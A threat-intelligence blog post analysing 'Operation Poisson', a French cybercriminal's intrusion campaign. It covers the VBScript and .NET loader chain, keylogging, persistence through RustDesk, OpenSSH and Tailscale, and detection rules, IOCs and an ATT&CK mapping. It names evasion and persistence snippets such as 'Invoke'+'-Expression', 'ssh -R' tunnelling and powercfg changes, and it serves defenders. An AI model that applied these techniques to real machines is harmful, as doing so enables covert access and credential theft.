Skip to main content
Blog

Operation Poisson: How a Junior Cybercriminal Built Persistence That Outlived His C2

  • June 25, 2026
  • 0 replies
  • 20 views
Aaron Beardslee
Forum|alt.badge.img

Overview

Between March 30 and May 1, 2026, Cato CTRL researcher Vitaly Simonovich tracked a French-speaking cybercriminal known by the handle "Poisson" through every command of a 33-day intrusion operation. The result was 339 recorded commands, four compromised victims, and a persistence mechanism that continued functioning for 18 days after the attacker's primary command-and-control (C2) server went offline.

What makes Operation Poisson stand out from the routine credential-theft campaigns that plague small businesses is not the sophistication of the attacker. Poisson is, by all available indicators, a junior operator -- likely a student learning offensive security while running live operations against real targets. What makes it notable is the specific persistence decision he made on Day 8: installing OpenSSH Server and Tailscale VPN on a victim machine to create a resilient access layer entirely independent of his C2 framework.

That single move validated what defenders have theorized for years but rarely had documented proof of: killing a C2 server is not the same as evicting an attacker. If the attacker has already built a parallel access path through a legitimate VPN mesh, the remediation accomplishes nothing.

This article examines the full operation, the attacker's tooling and techniques, the infrastructure he used, and what it means for detection and response teams.


Threat Actor Profile

Poisson is assessed as a junior, independent, financially motivated threat actor operating with a French-language context. He is not attributed to any known APT group or ransomware crew.

Handle: Poisson (French for "fish")
Secondary Handle: Stikou68
Linux Identity: avenger@ubuntu, home directory at /home/avenger/Desktop/
Language: French (installation notes, victim machines, and playbook were all in French)
Skill Level: Low-to-intermediate; failed approximately half of his attempted actions
Motivation: Financial -- targeting banking credentials, email passwords, and government portal access
Infrastructure Tier: Entirely free-tier (DuckDNS, Backblaze B2, budget IONOS VPS)

The "68" in his secondary handle is a significant detail. In France, "68" refers to the département Haut-Rhin in the Alsace region. Victim 1, a French automotive small business, operated in the same region. This detail was not deliberately disclosed by the attacker -- it was extracted from a test keystroke file he inadvertently left inside his own keylogger package, where he had typed "Stikou68!!!" repeatedly while testing the tool.

Operational Schedule: Cato CTRL observed consistent activity after 15:00 CET with a six-hour midday gap and occasional late-night sessions. This pattern is consistent with a school or academic schedule rather than a professional working day.

OPSEC Failures:

  • Leaked his home directory path five times across the campaign
  • Named Backblaze B2 buckets after his own handle (pois43, sentiwaw)
  • Left his complete SSH playbook, victim SSH keys, and French installation notes on a publicly accessible Backblaze B2 storage bucket
  • Left a self-incriminating test keystroke file inside his keylogger package
  • Failed at UAC elevation dozens of times before succeeding
  • Bandwidth caps on his free-tier Backblaze storage blocked his own payload downloads mid-operation for hours

Despite this, he compromised four machines, harvested credentials from real people, and built access that survived his own C2 going dark.


Targets

Poisson focused exclusively on French victims, likely due to language familiarity and geographic proximity. Cato CTRL identified the following victim profile:

  • Victim 1: A French automotive small business (region: Alsace, département 68)
  • Victims 2-4: French individuals, one confirmed in Val-d'Oise (département 95, near Paris)

All targets were running Windows. Victim 3, the primary target of extended operations, was confirmed to be running Windows 11 on physical hardware (ASRock B760M motherboard, Intel 12th-generation CPU) -- not a virtual machine, which is relevant because some of his sandbox evasion logic would have behaved differently in a VM.

The narrow targeting and manual credential-retrieval approach suggest this was not an automated mass campaign. Poisson was operating against a small, known-quantity victim set and retrieving the output by hand through the C2 session.


Infrastructure

Poisson built his infrastructure entirely from free-tier services:

Component Detail
C2 Teamserver 217[.]154[.]217[.]139 (IONOS SE, Berlin)
C2 Redirector 217[.]154[.]162[.]45 (IONOS SE, Berlin)
TLS Certificate CN wawsenti[.]duckdns[.]org
Payload Staging Bucket 1 pois43[.]s3[.]eu-central-003[.]backblazeb2[.]com
Payload Staging Bucket 2 w456w5[.]s3[.]eu-central-003[.]backblazeb2[.]com
Payload Staging Bucket 3 sentiwaw[.]s3[.]eu-central-003[.]backblazeb2[.]com
C2 Framework Havoc (Demon agent)
DNS DuckDNS (free dynamic DNS)

The naming convention across his buckets is consistent with his handles. "Pois" is short for Poisson, "senti" appears to be derived from his malware component senti.dll, and "waw" appears to come from his DuckDNS subdomain wawsenti. The bucket sentiwaw combines both elements and was specifically used to host the SSH packages and his playbook -- the bucket that was publicly readable and exposed his entire operation.


Kill Chain: Stage by Stage

Stage 1 -- VBScript Stager (sys.vbs)

The initial stager was a 1.1 KB VBScript file encrypted with AES. Its first action upon execution was a 120-second sleep -- a simple but effective sandbox evasion technique, as many automated analysis environments time out before the payload executes. After the delay, the script decrypted an embedded PowerShell payload and executed it.

To avoid static detection on the invocation string, the script split the expression across a string concatenation: 'Invoke'+'-Expression'. This is a well-known but still functional obfuscation technique that fools basic signature matching.

SHA256: aa7ea19e34567458b4ee66a7cd274181764984bf32123f756a7fdc64d5857b31

Stage 2 -- Fileless Multi-Layer Loader (senti.dll)

The most technically interesting component of the campaign is senti.dll, a 3.1 MB .NET DLL that functions as a five-layer shellcode delivery vehicle with zero files written to disk.

The outer layer encodes shellcode as a sequence of 207,813 English words. Each word maps to a byte value -- for example, "manage" decodes to 0x4D and "therapist" to 0x48. This word-encoding scheme makes the payload look like a large English text corpus at a glance and bypasses tools that scan for shellcode byte patterns.

Inside the word-encoded layer is a Donut-style reflective PE loader using XOR key 0x02, which wraps the actual Havoc Demon agent payload (XOR key 0x01). The Demon agent runs entirely in memory and establishes the C2 connection back to Poisson's IONOS server.

The five-layer structure -- VBScript stager > PowerShell loader > .NET DLL > reflective loader > Demon agent -- means the actual implant never touches disk in any recognizable form.

SHA256: 3b7642b0f84e83a36334c608655c6cb7aae774839a6a3488526b853d89830a60

Stage 3 -- UAC Elevation (Start-Process -Verb RunAs)

Once the Demon agent was running, Poisson attempted to escalate privileges using Start-Process -Verb RunAs. This is not a UAC bypass -- it is the standard Windows privilege elevation dialog. The user sees a consent prompt and must click "Yes." There is no silent exploitation here.

On Victims 1 and 2, someone clicked "Yes" quickly. On Victim 3, it took more than a dozen attempts spread across two days before the user granted consent. This is a meaningful indicator of operational noise: repeated UAC prompts on a machine are a direct detection signal that most endpoint alerting should catch.

Stage 4 -- Persistence Layer

After achieving admin privileges, Poisson deployed three overlapping persistence mechanisms:

  1. Scheduled Task ("TaskAdmin1"): Runs the VBScript stager at every logon with highest privileges. This is the primary re-infection vector on reboot.
  2. Startup Shortcut (sys.lnk): Placed in the user's Startup folder as a secondary persistence mechanism.
  3. Shellcode Injection into Explorer.EXE: The Demon agent shellcode was injected into the explorer.exe process, keeping the implant alive in memory without a standalone malware process visible in the process list.

Stage 5 -- Backup Remote Access (RustDesk)

Poisson deployed a custom-compiled version of RustDesk, a legitimate open-source remote desktop application, with his own relay server configuration baked in. This gave him a graphical remote access channel independent of the Havoc C2 framework.

RustDesk is significant here for two reasons. First, it is a signed, legitimate binary -- most AV and EDR products will not flag it by default. Second, it provides a graphical session in addition to the shell access through Havoc, allowing Poisson to navigate the filesystem visually, take screenshots, and browse through victim files without needing to know specific paths.

SHA256 (RustCustom.zip): c79091ceae7cd592fc08e4854cda7c1182af762b6b126371cc604debdc995fc7

Stage 6 -- Keylogger Deployment (KeyL.zip)

The credential collection mechanism was a 70-line Python script using the pynput library. It logged every keystroke to a local plaintext file on the victim machine. There was no automatic exfiltration -- no beacon, no upload server. Poisson manually retrieved the log file through his Havoc session.

He checked the keylogger output four times on a single day (April 2), confirming approximately 3,000 characters of captured keystrokes in a single active session on Victim 3. The targets were banking credentials, email passwords, and government portal logins -- the kind of credentials that give direct financial access to a small business owner.

To ensure continuous harvesting, Poisson ran powercfg /change standby-timeout-ac 300, setting the machine's sleep timeout to 300 minutes. The machine would stay awake and continue logging keystrokes around the clock.

SHA256 (KeyL.zip): 1f00fd604bb18bbe3081f9ce8d741c4029d2a2125eb8888ac4e0d955938059d6

Stage 7 -- VPN Mesh Persistence (The Critical Move)

On the night of April 7, during a five-hour session, Poisson executed the most consequential action of the entire campaign.

From his sentiwaw Backblaze bucket -- the one that also contained his readable playbook -- he downloaded an SSH package. He then:

  1. Installed OpenSSH Server on Victim 3's machine
  2. Configured key-based SSH authentication using his avenger@ubuntu SSH key pair
  3. Installed Tailscale VPN
  4. Joined Victim 3's machine to his private Tailscale mesh network
  5. Established an SSH reverse tunnel using ssh -R
  6. Tested both access paths

The Tailscale mesh creates an encrypted peer-to-peer network between enrolled nodes. Once a machine is joined to the mesh, it can be reached by other enrolled devices over Tailscale's network regardless of NAT, firewalls, or public IP changes. The SSH server running on Victim 3 was reachable through Tailscale without any exposed public port.

This access path had no dependency on the Havoc C2 server. It required no separate beaconing, no C2 connectivity, and no active session. It simply waited.


Timeline

Date Event
March 30 Day 1: Victim 1 compromised in 83 minutes. Scheduled task, RustDesk deployed.
March 31 Persistence established on Victim 3. First UAC elevation attempts fail.
April 1 51 commands (most active day). UAC eventually succeeds on Victim 3.
April 2 Keylogger deployed. Credentials harvested. powercfg keeps machine awake.
April 3-6 Maintenance, brief Victim 4 connection (4 minutes, likely testing).
April 7 OpenSSH Server + Tailscale installed. VPN mesh persistence established.
April 8 Brief morning session, final power settings. C2 goes offline at 20:44 UTC.
April 8-25 C2 dark for 18 days. Tailscale and SSH access remain active throughout.
April 26 C2 returns online. All victim agents reconnect automatically.
April 26-30 145 more commands. Keylogger harvested four times in 40 minutes on April 30.
April 30 certutil -scinfo run 10 times. Thales.zip accessed. Two .NET apps run.
April 30, 18:14 UTC Final recorded command. 17 files deleted including Thales artifacts.
May 1 C2 goes offline again. Has not returned.

The Open Question: Thales.zip

The unresolved element of this campaign is what happened on April 30 when Poisson transferred a file called Thales.zip from a victim's Downloads folder to Victim 3's machine.

He extracted a .NET application called WinFormsApp1.exe and ran it for 21 unattended minutes. He then ran a second file he had pre-staged in his own Backblaze bucket -- Thal.exe, a 148 MB self-contained executable bundled with the full .NET 8.0 runtime -- for another 11 minutes.

The naming is notable. Thales is a major French defense and technology company. Whether the file was something Poisson obtained, something belonging to a victim, or something else entirely is unknown. After both executions completed, Poisson spent four minutes deleting 17 files including all Thales-related artifacts.

The combination of prior certutil -scinfo smart card enumeration and the execution of an unknown application labeled with a defense contractor name -- followed by careful cleanup -- is the part of this campaign that remains unexplained.

SHA256 (Thal.exe): 0378a5ef51b008aa2d6b76bd44a0bf061339bc3b737a188ec82029444d4d18fe


Attribution and Context

Poisson is not attributed to a known APT group. The free-tier infrastructure, inconsistent operational tempo, high failure rate, and French language indicators all point to an individual operator without organizational backing.

The assessment of "junior" should not, however, be read as "harmless." Poisson succeeded. He compromised real machines, stole credentials from real people at a real business, and his access outlived his C2 being taken down. The lower bar for entry into offensive operations -- driven by openly available frameworks like Havoc, legitimate remote access tools like RustDesk and Tailscale, and free hosting infrastructure -- means that what once required significant technical skill can now be executed, imperfectly but effectively, by someone still learning.


Relevant History: Tailscale, RustDesk, and Legitimate Tool Abuse

Operation Poisson is not the first campaign to weaponize Tailscale. The technique of using legitimate VPN mesh software as a persistence and access layer has precedent at the highest levels of the threat landscape.

APT31 (China-nexus) used Tailscale to tunnel network traffic out of compromised Russian IT firms throughout 2024 and into 2025. In those operations, Tailscale served as an encrypted egress channel that blended with legitimate corporate VPN traffic.

Scattered Spider, the social engineering-focused group responsible for high-profile breaches including MGM Resorts and Caesars Entertainment, has used legitimate remote access tools including Ngrok and Fleetdeck as persistence mechanisms and access channels. The pattern of using signed, commercially available software to maintain access is consistent with Poisson's approach.

Akira Ransomware operators have been observed deploying RustDesk as a backup remote access channel in recent intrusion campaigns, mirroring Poisson's use of a custom-compiled RustDesk as a secondary C2 path.

The thread connecting these examples is the same principle Poisson applied: signed, legitimate binaries do not trip file-based detection. Detection that focuses on file reputation and hash matching fails to catch these tools because the tools themselves are not malicious -- only their deployment context is. Behavioral detection, not file scanning, is the required response.

This is also not the first time Havoc has been used as a C2 framework in targeted intrusions. Since its public release, Havoc has appeared in campaigns attributed to multiple threat actors across different geographies and motivations, largely because it is capable, open-source, and generates C2 traffic that can be configured to blend with legitimate HTTPS.


Detection Guidance

Process-Level Detections (Windows EDR)

OpenSSH Server Installation on Workstations
OpenSSH Server installation on a Windows workstation is rarely legitimate. The Windows Optional Feature OpenSSH.Server~~~~0.0.1.0 has a clear install event that should generate an alert on any non-server machine.

Relevant process indicators:

  • Add-WindowsCapability with parameter OpenSSH.Server
  • sc.exe creating or starting service sshd
  • sshd.exe running on a workstation-class host

Tailscale Installation
tailscale.exe or tailscaled.exe appearing on machines that do not have an approved VPN inventory entry should generate an immediate alert. Watch for:

  • Tailscale installer execution
  • Service creation for Tailscale
  • Network connections from tailscaled.exe to Tailscale's relay infrastructure (controlplane.tailscale.com, *.tailscale.io)
  • DNS queries to Tailscale coordination infrastructure from non-approved hosts

SSH Reverse Tunnel Establishment
The command ssh -R (remote port forwarding) from an endpoint to an external host is anomalous in virtually any enterprise environment. Process creation events showing ssh.exe with -R arguments should alert immediately.

Scheduled Task with Highest Privileges Running Script Interpreters
The scheduled task TaskAdmin1 is campaign-specific, but the behavioral pattern is generic: a scheduled task configured with -RunLevel Highest (or the equivalent XML <RunLevel>HighestAvailable</RunLevel>) that executes wscript.exe, powershell.exe, cmd.exe, or similar interpreters should be flagged on any workstation.

powercfg Standby Timeout Modification
powercfg /change standby-timeout-ac is not a malicious command on its own, but it is a known component of attacker persistence workflows where the attacker needs a machine to remain awake for ongoing credential harvesting or C2 beaconing. Alert on this command being run from unusual parent processes or in conjunction with other suspicious activity.

wscript.exe Executing .vbs from User-Writable Directories
Poisson staged his VBScript stager in user-accessible paths. wscript.exe executing .vbs files from %APPDATA%, %TEMP%, %USERPROFILE%, or \Downloads\ should generate an alert.

Shellcode Injection into Explorer.exe
Process injection into explorer.exe from an unexpected parent process is a high-fidelity detection signal. Sysmon Event ID 8 (CreateRemoteThread) targeting explorer.exe from a non-system process is worth alerting on.

Network-Level Detections

DuckDNS Subdomains
Block or alert on DNS resolution of *.duckdns.org at the corporate DNS resolver or proxy layer. While DuckDNS is a legitimate service, it has consistent appearance in threat actor infrastructure due to the free and anonymous registration model. Most enterprises have no legitimate business reason to resolve DuckDNS subdomains.

Tailscale Coordination Traffic from Unauthorized Hosts
If Tailscale is not an approved enterprise tool, DNS queries to controlplane.tailscale.com or HTTPS connections to *.tailscale.io from endpoint IPs should alert.

Backblaze B2 Object Storage Traffic
Connections to *.backblazeb2.com from endpoints outside of approved application inventory should be reviewed. Backblaze B2 is used by Poisson for all payload staging and is an increasingly common choice for threat actors due to low cost and CDN-grade delivery.

Havoc C2 Beacon Patterns
Havoc Demon agent traffic uses configurable HTTP/HTTPS profiles but has known default patterns. Network detection signatures for Havoc C2 traffic are available in public threat intelligence feeds.


Indicators of Compromise

Network

Type Indicator
C2 Teamserver 217[.]154[.]217[.]139
C2 Redirector 217[.]154[.]162[.]45
DuckDNS Domain wawsenti[.]duckdns[.]org
Payload Staging pois43[.]s3[.]eu-central-003[.]backblazeb2[.]com
Payload Staging w456w5[.]s3[.]eu-central-003[.]backblazeb2[.]com
Payload Staging sentiwaw[.]s3[.]eu-central-003[.]backblazeb2[.]com

File Hashes (SHA256)

File SHA256
sys.vbs aa7ea19e34567458b4ee66a7cd274181764984bf32123f756a7fdc64d5857b31
senti.dll 3b7642b0f84e83a36334c608655c6cb7aae774839a6a3488526b853d89830a60
RustCustom.zip c79091ceae7cd592fc08e4854cda7c1182af762b6b126371cc604debdc995fc7
SSH.zip f06e7e1a4363a01ba2a4fee2e28abdd623abf4194bda373f23ff0e151b5c2b45
KeyL.zip 1f00fd604bb18bbe3081f9ce8d741c4029d2a2125eb8888ac4e0d955938059d6
RevS.ps1 291cb1fd0f2709b4457447cbb87adacf5c36c1bcb0f8754524024d44174bb195
Thal.exe 0378a5ef51b008aa2d6b76bd44a0bf061339bc3b737a188ec82029444d4d18fe

Host

Type Value
Scheduled Task TaskAdmin1 (highest privileges, runs at logon)
Service sshd (configured auto-start)
Service Tailscale
Firewall Rules RustDesk Full Access, RustDesk Full Access OUT, SSH
Operator SSH Key ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIUZH+MrtQKX4Cy68ldwV+1KKpOKU/xrdnucyG5eKZAR avenger@ubuntu

MITRE ATT&CK Mapping

Technique ID Technique Name Usage
T1059.001 Command and Scripting Interpreter: PowerShell PowerShell loader chain
T1059.005 Command and Scripting Interpreter: VBScript sys.vbs initial stager
T1027 Obfuscated Files or Information Word-encoding, XOR layers, AES encryption in stager
T1055.001 Process Injection: Dynamic-link Library Injection Shellcode injection into explorer.exe
T1053.005 Scheduled Task/Job: Scheduled Task TaskAdmin1 persistence
T1547.001 Boot or Logon Autostart Execution: Startup Folder sys.lnk in Startup folder
T1219 Remote Access Software RustDesk custom build, OpenSSH Server
T1572 Protocol Tunneling SSH reverse tunnel via Tailscale mesh
T1021.004 Remote Services: SSH OpenSSH access through Tailscale
T1056.001 Input Capture: Keylogging 70-line Python keylogger via pynput
T1529 System Shutdown/Reboot (anti-remediation via persistence) Scheduled tasks, SSH survive reboot
T1562.001 Impair Defenses: Disable or Modify Tools powercfg standby modification

Key Takeaways

C2 takedown is not remediation. The defining lesson from Operation Poisson is documented proof that an attacker can build a parallel access layer that survives losing their primary C2. In this case, the access survived an 18-day outage and was still fully functional when the C2 came back online. Remediation teams must now actively hunt for secondary persistence mechanisms beyond the C2 they identified.

Legitimate tools are the evasion strategy. Poisson used no zero-days, no novel exploit techniques, and no custom implants with sophisticated anti-analysis capabilities (beyond the word-encoding loader). His access survived because Tailscale is signed, legitimate software that most organizations have no detection for. The same is true of OpenSSH Server and RustDesk. Detection that depends on file reputation cannot catch these.

The skill floor is lower than it looks. Poisson failed at roughly half of what he attempted. His OPSEC was poor enough that a public storage bucket exposed his entire playbook. And he still compromised four machines and harvested real credentials. As AI tooling and open-source offensive frameworks continue to lower the barrier to entry, the volume of Poisson-class operators will grow even as the individual skill level stays low.

The Thales question remains open. The execution of two unknown .NET applications under a name associated with a major defense contractor, followed by methodical evidence deletion, is the element of this campaign that deserves continued attention if either Thal.exe or WinFormsApp1.exe resurfaces in future investigations.


References

  1. Simonovich, V. (2026, June 16). Cato CTRL Threat Research: Operation Poisson -- Analyzing a Cybercriminal's Entire Operation. Cato Networks. https://www.catonetworks.com/blog/cato-ctrl-operation-poisson-analyzing-a-cybercriminals-entire-operation/

  2. Khandelwal, S. (2026, June 17). Junior Hacker Used Tailscale and OpenSSH to Keep Access After His C2 Went Offline. The Hacker News. https://thehackernews.com/2026/06/junior-hacker-used-tailscale-and.html

  3. MITRE ATT&CK. (2024). Protocol Tunneling (T1572). https://attack.mitre.org/techniques/T1572/

  4. MITRE ATT&CK. (2024). Remote Access Software (T1219). https://attack.mitre.org/techniques/T1219/

  5. MITRE ATT&CK. (2024). Input Capture: Keylogging (T1056.001). https://attack.mitre.org/techniques/T1056/001/

  6. Tailscale. (2026). How Tailscale Works. https://tailscale.com/blog/how-tailscale-works

  7. The Hacker News. (2025, November). China-Linked APT31 Launches Stealthy Operations. https://thehackernews.com/2025/11/china-linked-apt31-launches-stealthy.html

  8. The Hacker News. (2023, November). US Cybersecurity Agencies Warn of Scattered Spider. https://thehackernews.com/2023/11/us-cybersecurity-agencies-warn-of.html

  9. The Hacker News. (2025, September). SonicWall SSL VPN Flaw and Akira Ransomware. https://thehackernews.com/2025/09/sonicwall-ssl-vpn-flaw-and.html

  10. The Hacker News. (2023, February). Threat Actors Adopt Havoc Framework for Post-Exploitation. https://thehackernews.com/2023/02/threat-actors-adopt-havoc-framework-for.html